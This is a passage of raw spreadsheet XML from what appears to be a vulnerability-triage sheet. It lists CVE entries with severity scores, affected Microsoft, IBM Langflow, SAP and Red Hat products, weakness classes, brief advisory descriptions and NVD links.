t="inlineStr"><is><t>CVE-2026-83978</t></is></c><c r="D1030" s="5" t="n"><v>7.8</v></c><c r="E1030" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1030" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1030" s="5" t="inlineStr" /><c r="H1030" s="5" t="n"><v>0.003</v></c><c r="I1030" s="5" t="inlineStr" /><c r="J1030" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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0" s="5" t="inlineStr" /><c r="M1030" s="5" t="inlineStr" /><c r="N1030" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1030" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1030" s="5" t="inlineStr" /><c r="Q1030" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1030" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1030" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83978</t></is></c></row><row r="1031"><c r="A1031" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1031" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1031" s="5" t="inlineStr"><is><t>CVE-2026-83979</t></is></c><c r="D1031" s="5" t="n"><v>7.8</v></c><c r="E1031" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1031" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1031" s="5" t="inlineStr" /><c r="H1031" s="5" t="n"><v>0.003</v></c><c r="I1031" s="5" t="inlineStr" /><c r="J1031" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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1" s="5" t="inlineStr" /><c r="M1031" s="5" t="inlineStr" /><c r="N1031" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1031" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1031" s="5" t="inlineStr" /><c r="Q1031" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1031" s="5" t="inlineStr"><is><t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1031" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83979</t></is></c></row><row r="1032"><c r="A1032" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1032" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1032" s="5" t="inlineStr"><is><t>CVE-2026-83980</t></is></c><c r="D1032" s="5" t="n"><v>7.8</v></c><c r="E1032" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1032" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1032" s="5" t="inlineStr" /><c r="H1032" s="5" t="n"><v>0.003</v></c><c r="I1032" s="5" t="inlineStr" /><c r="J1032" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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2" s="5" t="inlineStr" /><c r="M1032" s="5" t="inlineStr" /><c r="N1032" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1032" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1032" s="5" t="inlineStr" /><c r="Q1032" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1032" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1032" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83980</t></is></c></row><row r="1033"><c r="A1033" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1033" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1033" s="5" t="inlineStr"><is><t>CVE-2026-83981</t></is></c><c r="D1033" s="5" t="n"><v>7.8</v></c><c r="E1033" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1033" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1033" s="5" t="inlineStr" /><c r="H1033" s="5" t="n"><v>0.003</v></c><c r="I1033" s="5" t="inlineStr" /><c r="J1033" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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3" s="5" t="inlineStr" /><c r="M1033" s="5" t="inlineStr" /><c r="N1033" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1033" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1033" s="5" t="inlineStr" /><c r="Q1033" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1033" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1033" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83981</t></is></c></row><row r="1034"><c r="A1034" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1034" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1034" s="5" t="inlineStr"><is><t>CVE-2026-83982</t></is></c><c r="D1034" s="5" t="n"><v>7.8</v></c><c r="E1034" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1034" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1034" s="5" t="inlineStr" /><c r="H1034" s="5" t="n"><v>0.003</v></c><c r="I1034" s="5" t="inlineStr" /><c r="J1034" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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4" s="5" t="inlineStr" /><c r="M1034" s="5" t="inlineStr" /><c r="N1034" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1034" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1034" s="5" t="inlineStr" /><c r="Q1034" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1034" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1034" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83982</t></is></c></row><row r="1035"><c r="A1035" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1035" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1035" s="5" t="inlineStr"><is><t>CVE-2026-83983</t></is></c><c r="D1035" s="5" t="n"><v>7.8</v></c><c r="E1035" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1035" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1035" s="5" t="inlineStr" /><c r="H1035" s="5" t="n"><v>0.003</v></c><c r="I1035" s="5" t="inlineStr" /><c r="J1035" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1035"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5" s="5" t="inlineStr" /><c r="M1035" s="5" t="inlineStr" /><c r="N1035" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1035" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1035" s="5" t="inlineStr" /><c r="Q1035" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1035" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1035" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83983</t></is></c></row><row r="1036"><c r="A1036" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1036" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1036" s="5" t="inlineStr"><is><t>CVE-2026-83985</t></is></c><c r="D1036" s="5" t="n"><v>7.8</v></c><c r="E1036" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1036" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1036" s="5" t="inlineStr" /><c r="H1036" s="5" t="n"><v>0.003</v></c><c r="I1036" s="5" t="inlineStr" /><c r="J1036" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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6" s="5" t="inlineStr" /><c r="M1036" s="5" t="inlineStr" /><c r="N1036" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1036" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1036" s="5" t="inlineStr" /><c r="Q1036" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1036" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1036" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83985</t></is></c></row><row r="1037"><c r="A1037" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1037" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1037" s="5" t="inlineStr"><is><t>CVE-2026-83986</t></is></c><c r="D1037" s="5" t="n"><v>7.8</v></c><c r="E1037" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1037" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1037" s="5" t="inlineStr" /><c r="H1037" s="5" t="n"><v>0.003</v></c><c r="I1037" s="5" t="inlineStr" /><c r="J1037" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1037"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7" s="5" t="inlineStr" /><c r="M1037" s="5" t="inlineStr" /><c r="N1037" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1037" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1037" s="5" t="inlineStr" /><c r="Q1037" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1037" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1037" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83986</t></is></c></row><row r="1038"><c r="A1038" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1038" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1038" s="5" t="inlineStr"><is><t>CVE-2026-83987</t></is></c><c r="D1038" s="5" t="n"><v>7.8</v></c><c r="E1038" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1038" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1038" s="5" t="inlineStr" /><c r="H1038" s="5" t="n"><v>0.003</v></c><c r="I1038" s="5" t="inlineStr" /><c r="J1038" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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8" s="5" t="inlineStr" /><c r="M1038" s="5" t="inlineStr" /><c r="N1038" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1038" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1038" s="5" t="inlineStr" /><c r="Q1038" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1038" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1038" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83987</t></is></c></row><row r="1039"><c r="A1039" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1039" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1039" s="5" t="inlineStr"><is><t>CVE-2026-83988</t></is></c><c r="D1039" s="5" t="n"><v>7.8</v></c><c r="E1039" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1039" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1039" s="5" t="inlineStr" /><c r="H1039" s="5" t="n"><v>0.003</v></c><c r="I1039" s="5" t="inlineStr" /><c r="J1039" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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039" s="5" t="inlineStr" /><c r="M1039" s="5" t="inlineStr" /><c r="N1039" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1039" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1039" s="5" t="inlineStr" /><c r="Q1039" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1039" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1039" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t></is></c></row><row r="1040"><c r="A1040" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1040" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1040" s="5" t="inlineStr"><is><t>CVE-2026-83990</t></is></c><c r="D1040" s="5" t="n"><v>7.8</v></c><c r="E1040" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1040" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1040" s="5" t="inlineStr" /><c r="H1040" s="5" t="n"><v>0.003</v></c><c r="I1040" s="5" t="inlineStr" /><c r="J1040" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1040" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1040" s="5" t="inlineStr" /><c r="M1040" s="5" t="inlineStr" /><c r="N1040" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1040" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1040" s="5" t="inlineStr" /><c r="Q1040" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R1040" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1040" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t></is></c></row><row r="1041"><c r="A1041" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1041" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1041" s="5" t="inlineStr"><is><t>CVE-2026-83995</t></is></c><c r="D1041" s="5" t="n"><v>7.8</v></c><c r="E1041" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1041" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1041" s="5" t="inlineStr" /><c r="H1041" s="5" t="n"><v>0.003</v></c><c r="I1041" s="5" t="inlineStr" /><c r="J1041" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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1" s="5" t="inlineStr" /><c r="M1041" s="5" t="inlineStr" /><c r="N1041" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1041" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1041" s="5" t="inlineStr" /><c r="Q1041" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1041" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S1041" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83995</t></is></c></row><row r="1042"><c r="A1042" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1042" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1042" s="5" t="inlineStr"><is><t>CVE-2026-84000</t></is></c><c r="D1042" s="5" t="n"><v>7.8</v></c><c r="E1042" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1042" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1042" s="5" t="inlineStr" /><c r="H1042" s="5" t="n"><v>0.003</v></c><c r="I1042" s="5" t="inlineStr" /><c r="J1042" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K104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042" s="5" t="inlineStr" /><c r="M1042" s="5" t="inlineStr" /><c r="N1042" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1042" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1042" s="5" t="inlineStr" /><c r="Q1042" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="R1042" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t></is></c><c r="S1042" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t></is></c></row><row r="1043"><c r="A1043" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1043" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1043" s="5" t="inlineStr"><is><t>CVE-2026-85983</t></is></c><c r="D1043" s="5" t="n"><v>7.8</v></c><c r="E1043" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1043" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1043" s="5" t="inlineStr" /><c r="H1043" s="5" t="n"><v>0.001</v></c><c r="I1043" s="5" t="inlineStr" /><c r="J1043" s="5" t="inlineStr" /><c r="K1043" s="5" t="inlineStr" /><c r="L1043" s="5" t="inlineStr" /><c r="M1043" s="5" t="inlineStr" /><c r="N1043" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1043" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1043" s="5" t="inlineStr" /><c r="Q1043" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R1043" s="5" t="inlineStr"><is><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is></c><c r="S1043" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85983</t></is></c></row><row r="1044"><c r="A1044" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1044" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1044" s="5" t="inlineStr"><is><t>CVE-2026-9034</t></is></c><c r="D1044" s="5" t="n"><v>7.8</v></c><c r="E1044" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1044" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1044" s="5" t="inlineStr" /><c r="H1044" s="5" t="n"><v>0.001</v></c><c r="I1044" s="5" t="inlineStr" /><c r="J1044" s="5" t="inlineStr" /><c r="K1044" s="5" t="inlineStr" /><c r="L1044" s="5" t="inlineStr" /><c r="M1044" s="5" t="inlineStr" /><c r="N1044" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1044" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1044" s="5" t="inlineStr" /><c r="Q1044" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1044" s="5" t="inlineStr"><is><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is></c><c r="S1044" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9034</t></is></c></row><row r="1045"><c r="A1045" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1045" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1045" s="5" t="inlineStr"><is><t>CVE-2026-18167</t></is></c><c r="D1045" s="5" t="n"><v>7.7</v></c><c r="E1045" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1045" s="5" t="inlineStr"><is><t>f23511db-6c3e-4e32-a477-6aa17d310630</t></is></c><c r="G1045" s="5" t="inlineStr" /><c r="H1045" s="5" t="n"><v>0.003</v></c><c r="I1045" s="5" t="inlineStr" /><c r="J1045" s="5" t="inlineStr" /><c r="K1045" s="5" t="inlineStr" /><c r="L1045" s="5" t="inlineStr" /><c r="M1045" s="5" t="inlineStr" /><c r="N1045" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1045" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1045" s="5" t="inlineStr" /><c r="Q1045" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R1045" s="5" t="inlineStr"><is><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is></c><c r="S1045" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18167</t></is></c></row><row r="1046"><c r="A1046" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1046" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1046" s="5" t="inlineStr"><is><t>CVE-2026-19304</t></is></c><c r="D1046" s="5" t="n"><v>7.7</v></c><c r="E1046" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1046" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G1046" s="5" t="inlineStr" /><c r="H1046" s="5" t="n"><v>0.003</v></c><c r="I1046" s="5" t="inlineStr" /><c r="J1046" s="5" t="inlineStr" /><c r="K1046" s="5" t="inlineStr"><is><t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t></is></c><c r="L1046" s="5" t="inlineStr" /><c r="M1046" s="5" t="inlineStr" /><c r="N1046" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1046" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1046" s="5" t="inlineStr" /><c r="Q1046" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1046" s="5" t="inlineStr"><is><t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to obtain sensitive information from internal services due to a URL parser discrepancy.</t></is></c><c r="S1046" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19304</t></is></c></row><row r="1047"><c r="A1047" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1047" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1047" s="5" t="inlineStr"><is><t>CVE-2026-19306</t></is></c><c r="D1047" s="5" t="n"><v>7.7</v></c><c r="E1047" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1047" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G1047" s="5" t="inlineStr" /><c r="H1047" s="5" t="n"><v>0.004</v></c><c r="I1047" s="5" t="inlineStr" /><c r="J1047" s="5" t="inlineStr" /><c r="K1047" s="5" t="inlineStr"><is><t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t></is></c><c r="L1047" s="5" t="inlineStr" /><c r="M1047" s="5" t="inlineStr" /><c r="N1047" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1047" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1047" s="5" t="inlineStr" /><c r="Q1047" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1047" s="5" t="inlineStr"><is><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is></c><c r="S1047" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19306</t></is></c></row><row r="1048"><c r="A1048" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1048" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1048" s="5" t="inlineStr"><is><t>CVE-2026-19397</t></is></c><c r="D1048" s="5" t="n"><v>7.7</v></c><c r="E1048" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1048" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1048" s="5" t="inlineStr" /><c r="H1048" s="5" t="n"><v>0.002</v></c><c r="I1048" s="5" t="inlineStr" /><c r="J1048" s="5" t="inlineStr" /><c r="K1048" s="5" t="inlineStr" /><c r="L1048" s="5" t="inlineStr" /><c r="M1048" s="5" t="inlineStr" /><c r="N1048" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1048" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1048" s="5" t="inlineStr" /><c r="Q1048" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R1048" s="5" t="inlineStr"><is><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is></c><c r="S1048" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19397</t></is></c></row><row r="1049"><c r="A1049" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1049" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1049" s="5" t="inlineStr"><is><t>CVE-2026-53553</t></is></c><c r="D1049" s="5" t="n"><v>7.7</v></c><c r="E1049" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1049" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1049" s="5" t="inlineStr" /><c r="H1049" s="5" t="n"><v>0.003</v></c><c r="I1049" s="5" t="inlineStr" /><c r="J1049" s="5" t="inlineStr" /><c r="K1049" s="5" t="inlineStr" /><c r="L1049" s="5" t="inlineStr" /><c r="M1049" s="5" t="inlineStr" /><c r="N1049" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1049" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P1049" s="5" t="inlineStr" /><c r="Q1049" s="5" t="inlineStr"><is><t>CWE-200, CWE-22</t></is></c><c r="R1049" s="5" t="inlineStr"><is><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is></c><c r="S1049" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53553</t></is></c></row><row r="1050"><c r="A1050" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1050" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1050" s="5" t="inlineStr"><is><t>CVE-2026-63464</t></is></c><c r="D1050" s="5" t="n"><v>7.7</v></c><c r="E1050" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1050" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1050" s="5" t="inlineStr" /><c r="H1050" s="5" t="n"><v>0.003</v></c><c r="I1050" s="5" t="inlineStr" /><c r="J1050" s="5" t="inlineStr" /><c r="K1050" s="5" t="inlineStr" /><c r="L1050" s="5" t="inlineStr" /><c r="M1050" s="5" t="inlineStr" /><c r="N1050" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1050" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1050" s="5" t="inlineStr" /><c r="Q1050" s="5" t="inlineStr"><is><t>CWE-862, CWE-918</t></is></c><c r="R1050" s="5" t="inlineStr"><is><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is></c><c r="S1050" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-63464</t></is></c></row><row r="1051"><c r="A1051" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1051" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1051" s="5" t="inlineStr"><is><t>CVE-2026-66767</t></is></c><c r="D1051" s="5" t="n"><v>7.7</v></c><c r="E1051" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1051" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1051" s="5" t="inlineStr" /><c r="H1051" s="5" t="n"><v>0.003</v></c><c r="I1051" s="5" t="inlineStr" /><c r="J1051" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1051" s="5" t="inlineStr" /><c r="L1051" s="5" t="inlineStr" /><c r="M1051" s="5" t="inlineStr" /><c r="N1051" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1051" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1051" s="5" t="inlineStr" /><c r="Q1051" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="R1051" s="5" t="inlineStr"><is><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is></c><c r="S1051" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66767</t></is></c></row><row r="1052"><c r="A1052" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1052" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1052" s="5" t="inlineStr"><is><t>CVE-2026-69683</t></is></c><c r="D1052" s="5" t="n"><v>7.7</v></c><c r="E1052" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1052" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1052" s="5" t="inlineStr" /><c r="H1052" s="5" t="n"><v>0.008</v></c><c r="I1052" s="5" t="inlineStr" /><c r="J1052" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1052" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1052" s="5" t="inlineStr" /><c r="M1052" s="5" t="inlineStr" /><c r="N1052" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1052" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1052" s="5" t="inlineStr" /><c r="Q1052" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1052" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1052" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69683</t></is></c></row><row r="1053"><c r="A1053" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1053" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1053" s="5" t="inlineStr"><is><t>CVE-2026-73267</t></is></c><c r="D1053" s="5" t="n"><v>7.7</v></c><c r="E1053" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1053" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1053" s="5" t="inlineStr" /><c r="H1053" s="5" t="n"><v>0.005</v></c><c r="I1053" s="5" t="inlineStr" /><c r="J1053" s="5" t="inlineStr" /><c r="K1053" s="5" t="inlineStr" /><c r="L1053" s="5" t="inlineStr" /><c r="M1053" s="5" t="inlineStr" /><c r="N1053" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1053" s="5" t="inlineStr"><is><t>2026-08-21</t></is></c><c r="P1053" s="5" t="inlineStr" /><c r="Q1053" s="5" t="inlineStr"><is><t>CWE-602</t></is></c><c r="R1053" s="5" t="inlineStr"><is><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is></c><c r="S1053" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73267</t></is></c></row><row r="1054"><c r="A1054" s="5" 